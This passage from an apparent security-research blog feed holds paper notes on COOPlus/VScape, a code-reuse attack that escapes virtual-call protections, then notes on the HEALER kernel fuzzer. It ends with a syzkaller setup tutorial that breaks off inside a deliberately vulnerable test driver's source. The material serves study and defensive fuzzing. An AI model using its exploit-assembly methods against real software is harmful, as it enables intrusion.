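Primitive Generation</h3><h4 id="Info-Collecting">Info Collecting</h4><p>VScape takes the target program's source code and collects vcall-related information at compile time:</p><ul><li>Virtual callsites: records <strong>all virtual callsites</strong> of the target program, along with the base interface class that statically declares the expected virtual function.</li><li>Class layouts: records <strong>the layout of every class</strong> during compilation, including class size, member field offsets, base classes and so on.</li><li>Virtual function information: records <strong>all type-compatible virtual functions</strong> for each virtual callsite, plus <strong>the largest field offset accessed</strong> in each virtual function, so that later checks can spot potential out-of-bounds accesses.</li></ul><h4 id="Primitive-Searching">Primitive Searching</h4><p>From the information gathered in the previous step, VScape selects the primitive tuples usable in an attack.</p><ul><li><p>First, VScape builds the <strong>class inheritance hierarchy (CHI) tree</strong>.</p></li><li><p>It initializes a <strong>global counter</strong>, starting from 0, that records the version of the <strong>target virtual function</strong> (not of every virtual function).</p></li><li><p>It runs BFS over the CHI tree and numbers each class node to record which version of the target virtual function it uses.</p><p>If a subclass uses the parent's version of the virtual function, it gets the parent's ID; otherwise the global counter is incremented by 1 and assigned to the subclass.</p></li></ul><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201090813355.png" alt="image-20211201090813355"></p><p>After this, VScape has a versioned CHI tree for the vcall, from which usable primitives <strong>(vcall, victim class, counterfeit class)</strong> can be formed.</p><p>There is one issue: with a very large number of vcalls and many classes, such a search can take a very long time, although that depends on the implementation.</p><h4 id="Primitive-Capability-Analysis">Primitive Capability Analysis</h4><p>With several primitives in hand, the next step is to determine what each can do in an exploit.</p><p>Just as vfgadgets were split into several types above, VScape treats the different types differently here.</p><ul><li><p>For OOB reads, it analyses whether the value read is loaded into the PC or written to a target memory address. In the latter case taint analysis is also used to decide whether the adversary controls the value written.</p></li><li><p>For OOB writes, it analyses whether the value written is a pointer; if so, it further looks at how the relay object is used, trying to find a way to bypass ASLR.</p></li></ul><h3 id="3-检测原语结构">3. 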
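Checking Primitive Structure</h3><p>With a large number of primitives collected, the usable ones have to be filtered further.</p><h4 id="Vulnerability-Matching">Vulnerability Matching</h4><p>Given the vulnerability description, VScape also takes the target heap allocator into account and keeps only:</p><blockquote><p>candidate primitives whose victim object is allocated in the same heap as the <strong>buffer that triggers the vulnerability</strong>.</p></blockquote><p>If the two are not allocated in the same heap, the primitive obviously cannot be used.</p><h4 id="Exploitable-Memory-States-Inference">Exploitable Memory States Inference</h4><p>To achieve a specific effect through the vcall (such as writing or reading data), execution has to happen in a <strong>specific memory state</strong>. For instance, certain fields of the class must hold particular values; otherwise the conditions inside the vcall are not met and the target location is never reached.</p><p>VScape confirms this with taint analysis and symbolic execution. It marks the <strong>victim object</strong> and the adjacent <strong>relay object</strong> as symbolic and symbolically executes the counterfeit functions that <strong>access the relay object out of bounds</strong>.</p><blockquote><p>It is easy to see why the <strong>relay object is made symbolic too</strong>: the counterfeit function may <strong>use values in out-of-bounds memory</strong>, and that memory holds the relay object.</p></blockquote><h3 id="4-约束求解">4. Constraint Solving</h3><p>VScape has now done a first filtering pass on the primitives. Three questions remain:</p><ul><li>Can control flow reach the target vcallsite and execute the victim class's vcall?</li><li>Can the OOB operation in the counterfeit function actually execute?</li><li>What data constraints satisfy the two points above?</li></ul><h4 id="Virtual-Callsite-Reachability-Testing">Virtual Callsite Reachability Testing</h4><p>For the first question, VScape uses directed fuzzing with the given benchmark inputs to <strong>obtain as large a list of reachable victim functions as it can (the list is necessarily incomplete)</strong>. VScape inserts a callback after the target vcallsite to record the victim function invoked and the test case.</p><h4 id="OOB-Instruction-Reachability-Solving">OOB Instruction Reachability Solving</h4><p>For the second question, VScape takes the test cases from the first step as input, saves the execution context once the target program reaches the target vcallsite, and has the symbolic execution engine symbolically execute the <strong>counterfeit function</strong> in that context to obtain the data dependencies for <strong>executing the counterfeit function's OOB operation</strong>.</p><blockquote><p>As before, the relay object is made symbolic and included in the symbolic execution.</p></blockquote><h4 id="Exploit-Assembling">Exploit Assembling</h4><p>VScape cannot generate exploits fully automatically; it relies on a user-supplied exploit template to build a complete exploit chain.</p><p>The user has to:</p><ul><li>perform heap feng shui in the exploit by hand</li><li>use the PoC in the exploit to change the victim object's vptr to a specific value</li><li>carry out the rest of the exploitation based on the information VScape provides</li></ul><p>Take this exploit template as an example:</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201095342891.png" alt="image-20211201095342891"></p><p>In the main function, the calls in black must be written by hand, while the calls in red are the work VScape can assist with.</p><h2 id="六、评估">VI. Evaluation</h2><p>VScape 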
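is evaluated along three dimensions:</p><ul><li>whether COOPlus is practical in real-world C++ programs</li><li>how effective COOPlus is at bypassing vcall protections</li><li>how well VScape performs in producing real, complete exploit chains</li></ul><p>From the conclusions in the slides, we can see that COOPlus is fairly practical in large projects.</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201095933789.png" alt="image-20211201095933789"></p><p>As for vcall protections, COOPlus can bypass those that meet the stated attack conditions.</p><blockquote><p>The stated attack conditions are: the C++ ABI is not broken, vptr integrity is not guaranteed, and multiple targets are allowed at a vcallsite.</p></blockquote><p>The paper also evaluates exploitation of PyQt and Firefox, which is not covered here.</p><p><img src="/2021/11/VScape_Assessing_and_Escaping_Virtual_Call_Protections/image-20211201100845912.png" alt="image-20211201100845912"></p>]]></content>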
    
    
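    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;This paper presents a &lt;strong&gt;strengthened variant&lt;/strong&gt; of Counterfeit Object-Oriented Programming (COOP), called &lt;strong&gt;COOPlus&lt;/strong&gt;. Among virtual call protections that do not break the C++ ABI, a considerable share are vulnerable to COOPlus.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Virtual calls that meet the following three conditions are vulnerable to COOPlus:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;the virtual call ABI is not broken&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;the integrity of C++ objects' vtable pointers is not guaranteed (i.e. they can be modified)&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;different functions may be invoked at a virtual callsite&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;COOPlus is in essence a &lt;strong&gt;code-reuse&lt;/strong&gt; attack: at the target virtual callsite it invokes a virtual function that is &lt;strong&gt;type-compatible but out of context&lt;/strong&gt;. The call passes C++ semantics-aware &lt;strong&gt;control-flow integrity (CFI)&lt;/strong&gt; checks, but because the calling context differs, it can lead to further exploitation.&lt;/p&gt;
&lt;p&gt;Besides COOPlus, the paper proposes &lt;strong&gt;VScape&lt;/strong&gt;, a solution for assessing the effectiveness of protections against virtual call attacks.&lt;/p&gt;
&lt;p&gt;Paper + slides - &lt;a href=&quot;https://www.usenix.org/conference/usenixsecurity21/presentation/chen-kaixiang&quot;&gt;USENIX security 21&lt;/a&gt;&lt;/p&gt;</summary>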
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="virtual call" scheme="https://kiprey.github.io/tags/virtual-call/"/>
    
  </entry>
  
  <entry>
    <title>HEALER - Relation Learning Guided Kernel Fuzzing: Paper Notes</title>
    <link href="https://kiprey.github.io/2021/11/healer/"/>
    <id>https://kiprey.github.io/2021/11/healer/</id>
    <published>2021-11-28T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.002Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Healer is a kernel fuzzer inspired by Syzkaller.</p><p>Like Syzkaller, Healer uses the syscall information provided by <a href="https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md">Syzlang</a> descriptions to generate system call sequences that satisfy the structural constraints on arguments and part of the semantic constraints, and finds kernel bugs by repeatedly executing the generated sequences until the kernel crashes.</p><p>Unlike Syzkaller, Healer does not use a choice table. Instead it dynamically removes calls from <strong>minimized call sequences</strong> and observes coverage changes to detect <strong>the relations between system calls</strong>, and uses those relations to guide sequence generation and mutation. Healer also has a different architecture from Syzkaller.</p><p>Paper: <a href="http://www.wingtecher.com/themes/WingTecherResearch/assets/papers/healer-sosp21.pdf">HEALER: Relation Learning Guided Kernel Fuzzing</a></p><p>Project: <a href="https://github.com/SunHao-0/healer">github</a></p><span id="more"></span><h2 id="二、概述">II. Overview</h2><p>An overview figure first:</p><p><img src="/2021/11/healer/image-20211129200131315.png" alt="image-20211129200131315"></p><p>Initially, syscall descriptions and a corpus are fed into healer, where Relation Learning extracts the relations between syscalls; these relations then drive better mutation and generation.</p><blockquote><p>In this paper, <code>Relation</code> refers to the internal relation between different syscalls.</p></blockquote><p>Healer runs test cases in the Executor and collects their coverage to feed the Dynamic Learning part of Relation Learning.</p><p>Although the paper is long, the core idea is fairly simple and has just three parts:</p><ul><li><strong>Static Learning</strong> and <strong>Dynamic Learning</strong> within Relation Learning</li><li>how Healer uses Relations for <strong>mutation</strong>.</li></ul><h2 id="三、Relation-Learning">III. Relation Learning</h2><h3 id="1-定义">1. 
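Definitions</h3><p>Healer uses Relation Learning to discover the relations between syscalls dynamically. One definition first:</p><blockquote><p>If executing a syscall $C_i$ can affect the <strong>execution path</strong> of another syscall $C_j$ (for instance because $C_i$ modifies <strong>internal kernel state</strong>), we say $C_i$ <strong>influences</strong> $C_j$.</p></blockquote><p>Healer uses a <strong>two-dimensional table $R^{n \times n}$</strong> (the Relation Table) to record the relations among n syscalls:</p><ul><li>$R_{ij}$ = 1 means syscall $C_i$ can influence the execution path of $C_j$.</li><li>$R_{ij}$ = 0 means it does not.</li></ul><blockquote><p>At start-up healer has recorded no relations between syscalls, so the table is all zeros.</p></blockquote><p>Relation Learning has two parts</p><ul><li>Static Learning: derives Relations from the <strong>argument types</strong> and <strong>return types</strong> in the syscall descriptions.</li><li>Dynamic Learning: finds Relations that the syscall descriptions cannot express.</li></ul><h3 id="2-Static-Learning">2. Static Learning</h3><p>Static Learning initializes the Relation Table from the information in the Syzlang descriptions. Argument types and return types are essential to this static analysis.</p><p>When both of the following conditions hold, static learning considers that syscall $C_i$ influences $C_j$ and sets $R_{ij} = 1$ in the Relation Table:</p><ol><li><p>The return type of $C_i$ is <strong>a resource type</strong> $r_0$, or some argument of $C_i$ is a pointer <strong>with outward data flow</strong>.</p><blockquote><p>This one is easy to understand: it requires that $C_i$ produces outward data flow.</p></blockquote></li><li><p>At least one argument of $C_j$ has a <strong>resource type with inward data flow</strong>, either $r_0$ or a type $r_1$ compatible with $r_0$. Since syzlang supports type nesting (type compatibility), $r_1$ qualifies as well.</p></li></ol><p>These two conditions explicitly constrain the data-flow direction to be $C_i\to C_j$; this is the Relation that static learning can establish.</p><p><strong>Static learning can be thought of as capturing direct relations between two system calls</strong> (such as data-flow relations).</p><h3 id="3-Dynamic-Learning">3. 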
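Dynamic Learning</h3><p>Dynamic learning uses information that syzlang cannot express to update and refine the relation table, so that higher-quality test cases can be generated.</p><p>Initially, healer collects the coverage of each syscall in a sequence separately and stores the sequence of identifiers of the basic blocks and edges it hit, <strong>so that new coverage can be recognised in later runs</strong>.</p><p>Dynamic Learning then applies a minimization algorithm to obtain system call sequences that are <strong>as small as possible with unchanged coverage</strong>.</p><blockquote><p>This step filters out system calls that contribute nothing to the new coverage and strengthens the analysis.</p><p>The minimization algorithm <strong>traverses the sequence backwards</strong> and extracts the system calls that are <strong>not already contained in another minimal sequence</strong> (to avoid duplicates) and that <strong>produced new coverage</strong> (only new coverage is useful).</p></blockquote><p>The core idea is simple; figure first:</p><p><img src="/2021/11/healer/image-20211129204151676.png" alt="image-20211129204151676"></p><p>In short, the algorithm has two inputs:</p><ol><li>the system call sequence p (the test case)</li><li>the <strong>new</strong> coverage produced by each syscall in p (note the word <strong>new</strong>)</li></ol><p>It then walks the system calls from back to front:</p><ul><li>A system call that produces no <strong>new</strong> coverage is dropped outright (no new coverage, hence of no use).</li><li>A system call that was dropped before is dropped again.</li><li>It then loops over the sequence from back to front, repeatedly trying to drop system calls. If coverage is unchanged after dropping one, that call is useless and can be dropped; otherwise it must be kept.</li></ul><blockquote><p>This step only removes system calls that do not affect coverage.</p></blockquote><p>After minimization, Dynamic Learning removes syscalls from the minimal sequence one at a time and checks the effect of each removal on the <strong>next syscall</strong>. The algorithm is:</p><p><img src="/2021/11/healer/image-20211129205500333.png" alt="image-20211129205500333"></p><p>It is simple too. In short:</p><blockquote><p>Iterate over all syscalls in the given minimal sequence.</p><p>Let the current system call be $C_j$ and let $C_i$ be the system call <strong>immediately before</strong> $C_j$ (previous).</p><p>If removing $C_i$ from the sequence changes the coverage of $C_j$, then $C_i$ influences $C_j$ and we can set $R_{ij} = 1$.</p></blockquote><p>One key point: for the sequence $[C_0, C_1, C_2]$, if removing $C_1$ affects the coverage of $C_2$, we can conclude that $C_1 \to C_2$ is an influence relation. But if removing $C_0$ changes the coverage of $C_2$, that does <strong>not</strong> establish $C_0 \to C_2$, because removing $C_0$ may change the coverage of $C_1$ and thereby affect $C_2$ only indirectly.</p><p>With these two algorithms, healer uses coverage information to build up the relations between system calls.</p><p><strong>Dynamic learning can be thought of as capturing indirect relations between two system calls</strong> (such as changes to internal kernel state).</p><h2 id="四、变异与生成">IV. Mutation and Generation</h2><p>Once the Relation Table has been built up by the algorithms above, it is used to guide mutation and generation. Leaving aside the usual mutations (randomly inserting syscalls, mutating argument types and so on), here we only cover <strong>how healer uses the Relation Table 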
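to mutate</strong>.</p><p>Healer mutates system call sequences already in the corpus. Having picked a sequence to mutate, healer</p><ol><li>picks a random insertion point in the sequence</li><li>feeds the sub-sequence before the insertion point to the <strong>mutation algorithm</strong> and inserts the system call it selects at that point.</li></ol><p>The mutation algorithm is:</p><p><img src="/2021/11/healer/image-20211129211440619.png" alt="image-20211129211440619"></p><p>In plain terms:</p><ul><li>If a random draw falls below $1-\alpha$, return a random system call directly.</li><li>Otherwise, walk the given sub-sequence S and add to a candidate queue every syscall that a syscall in S may influence. If a candidate has already been added, increase its weight.</li><li>Finally, pick one candidate syscall at random according to the weights.</li></ul><p>Note that when healer has just started, the Relation Table holds too little data to guide mutation and generation, and <strong>over-relying on an under-informed relation table can reduce test case diversity</strong>. On the other hand, not using the Relation Table at all would keep test case quality low (and would make all the work above pointless).</p><p><strong>The $\alpha$ in the mutation algorithm is therefore the key to balancing the two</strong>: if coverage grows while the learned Relations are being used, $\alpha$ is increased accordingly, further raising the probability of using the non-random mutation strategy.</p><h2 id="五、评估">V. Evaluation</h2><p>Over 24 hours of fuzzing, healer achieves broader coverage than syzkaller:</p><p><img src="/2021/11/healer/image-20211130095845117.png" alt="image-20211130095845117"></p><p>Note that the coverage curves of healer and syzkaller coincide at the beginning, because healer has not yet built a sufficient Relation Table and is still mutating randomly.</p><p>The figure below shows how the Relations are built up over time (<strong>each dot</strong> is <strong>a different syscall</strong> and a <strong>directed edge</strong> is an <strong>influence relation</strong>):</p><p><img src="/2021/11/healer/image-20211130101056881.png" alt="image-20211130101056881"></p><p>At first the Relations are those derived by static analysis, so the relation graph <strong>consists of a great many subgraphs</strong>.</p><p>As time passes, more implicit relations are found and the subgraphs gradually connect, eventually forming one huge relation graph.</p><p>In addition, healer found some new bugs that syzkaller had not.</p><h2 id="六、局限性">VI. Limitations</h2><p>Syzlang descriptions are mostly written by hand, which is labour-intensive, and their correctness and completeness cannot be guaranteed.</p><p>One possible solution is to convert the definitions in C header files into Syzlang descriptions automatically, preserving the original structure definitions.</p><h2 id="七、随笔">VII. Closing Notes</h2><p>The overall idea of this paper is not complicated, but it really does capture the relations between system calls, and both the ideas and the detailed methods are thought through very carefully. It is a very good paper.</p>]]></content>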
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;Healer is a kernel fuzzer inspired by Syzkaller.&lt;/p&gt;
&lt;p&gt;Like Syzkaller, Healer uses the syscall information provided by &lt;a href=&quot;https://github.com/google/syzkaller/blob/master/docs/syscall_descriptions.md&quot;&gt;Syzlang&lt;/a&gt; descriptions to generate system call sequences that satisfy the structural constraints on arguments and part of the semantic constraints, and finds kernel bugs by repeatedly executing the generated sequences until the kernel crashes.&lt;/p&gt;
&lt;p&gt;Unlike Syzkaller, Healer does not use a choice table. Instead it dynamically removes calls from &lt;strong&gt;minimized call sequences&lt;/strong&gt; and observes coverage changes to detect &lt;strong&gt;the relations between system calls&lt;/strong&gt;, and uses those relations to guide sequence generation and mutation. Healer also has a different architecture from Syzkaller.&lt;/p&gt;
&lt;p&gt;Paper: &lt;a href=&quot;http://www.wingtecher.com/themes/WingTecherResearch/assets/papers/healer-sosp21.pdf&quot;&gt;HEALER: Relation Learning Guided Kernel Fuzzing&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Project: &lt;a href=&quot;https://github.com/SunHao-0/healer&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    <category term="论文阅读" scheme="https://kiprey.github.io/categories/%E8%AE%BA%E6%96%87%E9%98%85%E8%AF%BB/"/>
    
    
    <category term="fuzz" scheme="https://kiprey.github.io/tags/fuzz/"/>
    
    <category term="kernel" scheme="https://kiprey.github.io/tags/kernel/"/>
    
  </entry>
  
  <entry>
    <title>Setting Up a syzkaller Environment</title>
    <link href="https://kiprey.github.io/2021/11/syzkaller_1/"/>
    <id>https://kiprey.github.io/2021/11/syzkaller_1/</id>
    <published>2021-11-19T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.115Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Syzkaller is an unsupervised, coverage-guided kernel fuzzer and something of a milestone among current fuzzers.</p><p>Project: <a href="https://github.com/google/syzkaller">syzkaller</a></p><p>I am interested in how syzkaller works, and my research group uses it regularly, so getting to know syzkaller is a necessary step.</p><p>Before studying how kernel fuzzing works, we first need to learn how to set up its environment.</p><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><ul><li><p>syzkaller is written in Go, so the Go toolchain is required. I did not run into any trouble here: simply running</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install golang <span class="comment"># golang was version 1.15 at the time of writing</span></span><br><span class="line">make all</span><br></pre></td></tr></table></figure><p>builds all of the syzkaller programs.</p></li><li><p>Installing qemu needs no explanation:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt install qemu-system-x86</span><br></pre></td></tr></table></figure></li><li><p>Next, fetch the kernel source. The clone takes a very long time:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://mirrors.tuna.tsinghua.edu.cn/git/linux.git</span><br></pre></td></tr></table></figure><p>The git commit id I used: a90af8f15bdc9449ee2d24e1d73fa3f7e8633f81</p><p>Following the <a href="https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md">official syzkaller documentation</a>, first run <code>make defconfig</code> to generate the default kernel build configuration, then manually add the following options to the <code>.config</code> file:</p><blockquote><p>These options make the kernel better suited to being fuzzed.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Coverage collection.</span></span><br><span class="line">CONFIG_KCOV=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Debug info for symbolization.</span></span><br><span class="line">CONFIG_DEBUG_INFO=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Memory bug detector</span></span><br><span class="line">CONFIG_KASAN=y</span><br><span class="line">CONFIG_KASAN_INLINE=y</span><br><span class="line"></span><br><span class="line"><span class="comment"># Required for Debian Stretch</span></span><br><span class="line">CONFIG_CONFIGFS_FS=y</span><br><span class="line">CONFIG_SECURITYFS=y</span><br></pre></td></tr></table></figure><p>Then run <code>make olddefconfig</code> again to update the build configuration, and run the following command to build the <strong>complete</strong> kernel (including drivers):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">make -j `<span class="built_in">nproc</span>`</span><br></pre></td></tr></table></figure></li><li><p>Set up the <strong>disk image</strong></p><p>First install debootstrap, a Linux tool for building a <strong>basic root file system</strong>.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> apt-get install debootstrap</span><br></pre></td></tr></table></figure><p>Then run the following commands in the linux source directory to create a <strong>Debian Stretch Linux image</strong>:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> image</span><br><span class="line"><span class="built_in">cd</span> image/</span><br><span class="line">wget https://raw.githubusercontent.com/google/syzkaller/master/tools/create-image.sh -O create-image.sh</span><br><span class="line"><span class="built_in">chmod</span> +x create-image.sh</span><br><span class="line">./create-image.sh</span><br></pre></td></tr></table></figure><p>Once the image has been created, several new files appear in the same directory:</p><p><img src="/2021/11/syzkaller_1/image-20211121114611675.png" alt="image-20211121114611675"></p></li><li><p>When all of the steps above are done, run the following command to try booting the kernel:</p><blockquote><p>Remember to replace the kernel path and the drive file path with your own.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">  -m 2G \</span><br><span class="line">  -smp 2 \</span><br><span class="line">  -kernel /usr/class/linux/arch/x86/boot/bzImage \</span><br><span class="line">  -append <span class="string">&quot;console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0&quot;</span> \</span><br><span class="line">  -drive file=/usr/class/linux/image/stretch.img,format=raw \</span><br><span class="line">  -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \</span><br><span class="line">  -net nic,model=e1000 \</span><br><span class="line">  -enable-kvm \</span><br><span class="line">  -nographic \</span><br><span class="line">  -pidfile vm.pid \</span><br><span class="line">  2&gt;&amp;1 | <span class="built_in">tee</span> 
vm.log</span><br></pre></td></tr></table></figure><p>If everything works, a syzkaller login prompt appears. Enter <code>root</code> as the user name (no password is needed) to get a shell:</p><p><img src="/2021/11/syzkaller_1/image-20211121115312828.png" alt="image-20211121115312828"></p><p>We can then open another terminal and run the following command to log in over ssh. Here <code>$IMAGE</code> stands for the image directory created above.</p><blockquote><p>We test that ssh works because syzkaller itself relies on ssh.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i <span class="variable">$IMAGE</span>/stretch.id_rsa -p 10021 -o <span class="string">&quot;StrictHostKeyChecking no&quot;</span> root@localhost</span><br></pre></td></tr></table></figure><p><img src="/2021/11/syzkaller_1/image-20211121115439899.png" alt="image-20211121115439899"></p><p>Once everything checks out, run <code>poweroff</code> to shut the kernel down.</p></li><li><p>Try running <code>syz-manager</code></p><p>First create a file named <code>my.cfg</code>. It is the syzkaller configuration file, with the following content:</p><blockquote><p>Be sure to replace all of the paths in it with your own.</p></blockquote><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;target&quot;</span><span class="punctuation">:</span> <span class="string">&quot;linux/amd64&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;http&quot;</span><span class="punctuation">:</span> <span 
class="string">&quot;127.0.0.1:56741&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;workdir&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller/workdir&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;kernel_obj&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;image&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux/image/stretch.img&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;sshkey&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/linux/image/stretch.id_rsa&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;syzkaller&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;procs&quot;</span><span class="punctuation">:</span> <span class="number">8</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;qemu&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;vm&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;count&quot;</span><span class="punctuation">:</span> <span class="number">4</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;kernel&quot;</span><span class="punctuation">:</span> <span 
class="string">&quot;/usr/class/linux/arch/x86/boot/bzImage&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;cpu&quot;</span><span class="punctuation">:</span> <span class="number">2</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;mem&quot;</span><span class="punctuation">:</span> <span class="number">2048</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><p>Then start it up and see what happens:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> syzkaller</span><br><span class="line"><span class="built_in">mkdir</span> workdir</span><br><span class="line">./bin/syz-manager -config=my.cfg</span><br></pre></td></tr></table></figure><p>It appears to run quite smoothly:</p><p><img src="/2021/11/syzkaller_1/image-20211121120608962.png" alt="image-20211121120608962"></p><p>The syzkaller web interface works as well:</p><p><img src="/2021/11/syzkaller_1/image-20211121120652065.png" alt="image-20211121120652065"></p><blockquote><p>Good, the environment setup went without much trouble (lol)</p></blockquote></li></ul><h2 id="三、crash-测试">III. Crash Test</h2><p>The proof of the pudding is in the eating: we build a vulnerable driver into the kernel and then try to get syzkaller to find the bug by fuzzing.</p><blockquote><p>This part mainly follows the syzkaller crash demo on GitHub listed in the references.</p></blockquote><h3 id="1-将漏洞驱动编译进-kernel">1. 
Building the vulnerable driver into the kernel</h3><p>Here we use a vulnerable driver that someone else has already prepared: <a href="https://github.com/hardenedlinux/Debian-GNU-Linux-Profiles/blob/master/docs/harbian_qa/fuzz_testing/test.c">test.c</a>.</p><p>A brief look at this vulnerable driver:</p><ul><li><p>When the driver is first loaded, it creates the file <code>test</code> under the <code>/proc</code> directory. Reads and writes on this proc entry are handled by the kernel through the <code>proc_*</code> family of functions.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MY_DEV_NAME <span class="string">&quot;test&quot;</span></span></span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> a = &#123;</span><br><span class="line">                                .open = proc_open,</span><br><span class="line">                                .read = proc_read,</span><br><span class="line">                                .write = proc_write,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> __init <span class="title">mod_init</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span 
